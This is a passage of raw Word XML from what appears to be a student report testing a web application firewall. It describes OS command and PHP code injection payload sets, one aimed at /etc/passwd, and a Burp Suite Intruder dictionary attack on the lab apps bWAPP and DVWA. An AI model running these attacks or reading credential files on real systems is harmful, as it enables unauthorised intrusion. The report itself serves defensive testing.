          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The 143 OS command injection payloads consisted of a list of available Linux commands </w:t>
      </w:r>
      <w:r w:rsidR="00CE0964">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="002666DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/etc and /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00CE0964">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> added to the list</w:t>
      </w:r>
      <w:r w:rsidR="002666DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F214AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00896636">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The 154 PHP code injection payloads consisted of selected 154 of the many PHP functions available.</w:t>
      </w:r>
      <w:r w:rsidR="00A46E5A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The 20 </w:t>
      </w:r>
      <w:r w:rsidR="004867CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>items in the dictionary list</w:t>
      </w:r>
      <w:r w:rsidR="00A46E5A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for broken authentication consisted of some common usernames and passwords, along with legitimate default login credentials for bWAPP and DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592BF463" w14:textId="18C6CDE2" w:rsidR="00BF65E4" w:rsidRDefault="00BF65E4" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The results would be tabulated to display how may of the payloads were blocked against the total number of payloads used for each attack vector</w:t>
      </w:r>
      <w:r w:rsidR="00E9765D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> except for broken authentication. Broken authentication’s result would display either allowed or blocked.</w:t>
      </w:r>
      <w:r w:rsidR="005A7954">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allowed would refer to the dictionary attack being a success while blocked refers to failure</w:t>
      </w:r>
      <w:r w:rsidR="006C10E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it was blocked by the WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D63C0F" w14:textId="5679BA12" w:rsidR="008737B8" w:rsidRPr="00F67F77" w:rsidRDefault="00D07633" w:rsidP="00D07633">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.5.2 </w:t>
      </w:r>
      <w:r w:rsidR="008737B8" w:rsidRPr="00F67F77">
        <w:t>Attack Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCAC944" w14:textId="070B2660" w:rsidR="008737B8" w:rsidRPr="00DE6606" w:rsidRDefault="00734F5D" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack method used for each of the attack vector was the same. Firstly, the respective vulnerable web application’s page would be loaded on the web browser. </w:t>
      </w:r>
      <w:r w:rsidR="000564AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, with Burp Suite’s intercept function turned on, a sample payload would be input into the form or browser’s address bar and submitted. Upon its submission, the request would be intercepted by Burp Suite as seen in Figure </w:t>
      </w:r>
      <w:r w:rsidR="009503DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="000564AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B22AFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The request would then be sent to Intruder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9809ED" w14:textId="24B8AA84" w:rsidR="008737B8" w:rsidRDefault="008737B8" w:rsidP="00F869AF">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14865761" wp14:editId="00D2CECD">
            <wp:extent cx="5731510" cy="20383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38350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B724871" w14:textId="7E1F858C" w:rsidR="00F869AF" w:rsidRPr="00DE6606" w:rsidRDefault="00F869AF" w:rsidP="00F869AF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc71138535"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Burp Suite intercept request</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="7BC65A35" w14:textId="61AED0CB" w:rsidR="008737B8" w:rsidRPr="00DE6606" w:rsidRDefault="00FF6FAE" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the Intruder received the request, it was important to identify the parameter that would be filled in by the attack payload as seen in Figure </w:t>
      </w:r>
      <w:r w:rsidR="00EB7E44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Once identified, that parameter would be selected by highlighting then clicking on the “Add” button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FA21D" w14:textId="5630271A" w:rsidR="008737B8" w:rsidRDefault="008737B8" w:rsidP="00F869AF">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3254488B" wp14:editId="666FCD91">
            <wp:extent cx="5731510" cy="18211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21180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058E20C" w14:textId="6907DCC9" w:rsidR="00F869AF" w:rsidRPr="00DE6606" w:rsidRDefault="00F869AF" w:rsidP="00F869AF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc71138536"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E427D1">
        <w:t xml:space="preserve"> - Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> intruder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="0ADDC10D" w14:textId="3532F7A0" w:rsidR="00FF6FAE" w:rsidRDefault="00FF6FAE" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The next step was to import the list of payloads for that attack vector. This could be done by </w:t>
      </w:r>
      <w:r w:rsidR="004214B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>loading the list in the “Payloads” tab.</w:t>
      </w:r>
      <w:r w:rsidR="007768FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now, the attack could commence by clicking on “Start Attack” button.</w:t>
      </w:r>
      <w:r w:rsidR="00FC3197">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Intruder would process through each of the payload added, inject it into the request intercepted and forward it. This process would be repeated the same number of times as the number of payloads there were in the list.</w:t>
      </w:r>
      <w:r w:rsidR="005B5D5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The behaviour of the process is similar to that of a brute force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13B293" w14:textId="51B9844B" w:rsidR="008737B8" w:rsidRPr="00DE6606" w:rsidRDefault="008737B8" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">After all the </w:t>
      </w:r>
      <w:r w:rsidR="00267D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Intruder</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> had completely passed all the values in the payload list, the result would be displayed</w:t>
      </w:r>
      <w:r w:rsidR="00EC5B08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a window</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Within the results window, failed request</w:t>
      </w:r>
      <w:r w:rsidR="009A6694">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A6694">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> reflected by the 4xx </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">status codes, which would mean that it was blocked by the WAF. If it returned any other code, it </w:t>
      </w:r>
      <w:r w:rsidR="00A461D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>would be</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> considered a successful request and that it was not blocked by the WAF. Figure </w:t>
      </w:r>
      <w:r w:rsidR="00855B9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows an example of the list of payload values that were blocked by the WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B69B21" w14:textId="31E52B78" w:rsidR="008737B8" w:rsidRDefault="008737B8" w:rsidP="00A423B5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A2E2D8B" wp14:editId="08962B61">
            <wp:extent cx="4848225" cy="1571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8225" cy="1571625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC172C9" w14:textId="446EFB05" w:rsidR="00A423B5" w:rsidRPr="00DE6606" w:rsidRDefault="00A423B5" w:rsidP="00A423B5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc71138537"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="005C499A">
        <w:t>Failed PHP code injection requests on Burp Suite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="7AD77B60" w14:textId="4D357F4A" w:rsidR="00133670" w:rsidRPr="00DB2CC0" w:rsidRDefault="00D07633" w:rsidP="00D07633">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.5.3 </w:t>
      </w:r>
      <w:r w:rsidR="00960C3C">
        <w:t xml:space="preserve">Broken Authentication </w:t>
      </w:r>
      <w:r w:rsidR="00AA7D5C">
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidR="00960C3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00133670" w:rsidRPr="00DB2CC0">
        <w:t>Dictionary Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C387DA7" w14:textId="372EA0EB" w:rsidR="0067542D" w:rsidRDefault="00133670" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The web applications</w:t>
      </w:r>
      <w:r w:rsidR="00B1107F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, bWAPP and DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:r w:rsidR="00875207">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">servers required login in order to access them. </w:t>
      </w:r>
      <w:r w:rsidR="00291B26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The process to perform the dictionary attack was similar to that of the other attack vectors.</w:t>
      </w:r>
      <w:r w:rsidR="0067542D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite to intercept the HTTP request, two parts of the request that would contain the username and password input</w:t>
      </w:r>
      <w:r w:rsidR="0067542D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> were identified and selected.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0067542D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Intruder would then</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> perform</w:t>
      </w:r>
      <w:r w:rsidR="0067542D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> dictionary attack </w:t>
      </w:r>
      <w:r w:rsidR="0067542D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>using the payloads loaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0067542D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The difference this time, would be that two lists of payloads were loaded; one for the username input and the other for the password input.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4F980" w14:textId="70CD1D47" w:rsidR="00133670" w:rsidRPr="00DE6606" w:rsidRDefault="00133670" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The time taken to complete the attack was dependent on the length of the dictionary lists. The total number of requests that would be </w:t>
      </w:r>
      <w:r w:rsidR="003A42FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>forwarded</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Burp Suite would be the length of each list multiplied by each other. In this test, </w:t>
      </w:r>
      <w:r w:rsidR="003A42FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
      <w:r w:rsidR="003A42FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of length 10 for the usernames and 20 for the passwords</w:t>
      </w:r>
      <w:r w:rsidR="003A42FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> were used respectively</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. This amounted to a total of 200 requests </w:t>
      </w:r>
      <w:r w:rsidR="005A6948">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>processed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04856E" w14:textId="17DC1544" w:rsidR="00133670" w:rsidRPr="00DE6606" w:rsidRDefault="00133670" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike the </w:t>
      </w:r>
      <w:r w:rsidR="00547DBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">results from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">other attack </w:t>
      </w:r>
      <w:r w:rsidR="00547DBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>vectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, login successes and failures both returned status code 200. To identify if the login attempt succeeded or failed, Burp Suite </w:t>
      </w:r>
      <w:r w:rsidR="00652E99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">was configured </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">to check if the response contained the message that would be returned when a login fails. For example, in bWAPP, that message would be “Incorrect credentials. Please try again.” In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">results, those that were checked indicated that the request failed, while unchecked indicated that the request succeeded </w:t>
      </w:r>
      <w:r w:rsidR="00652E99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">as depicted in </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
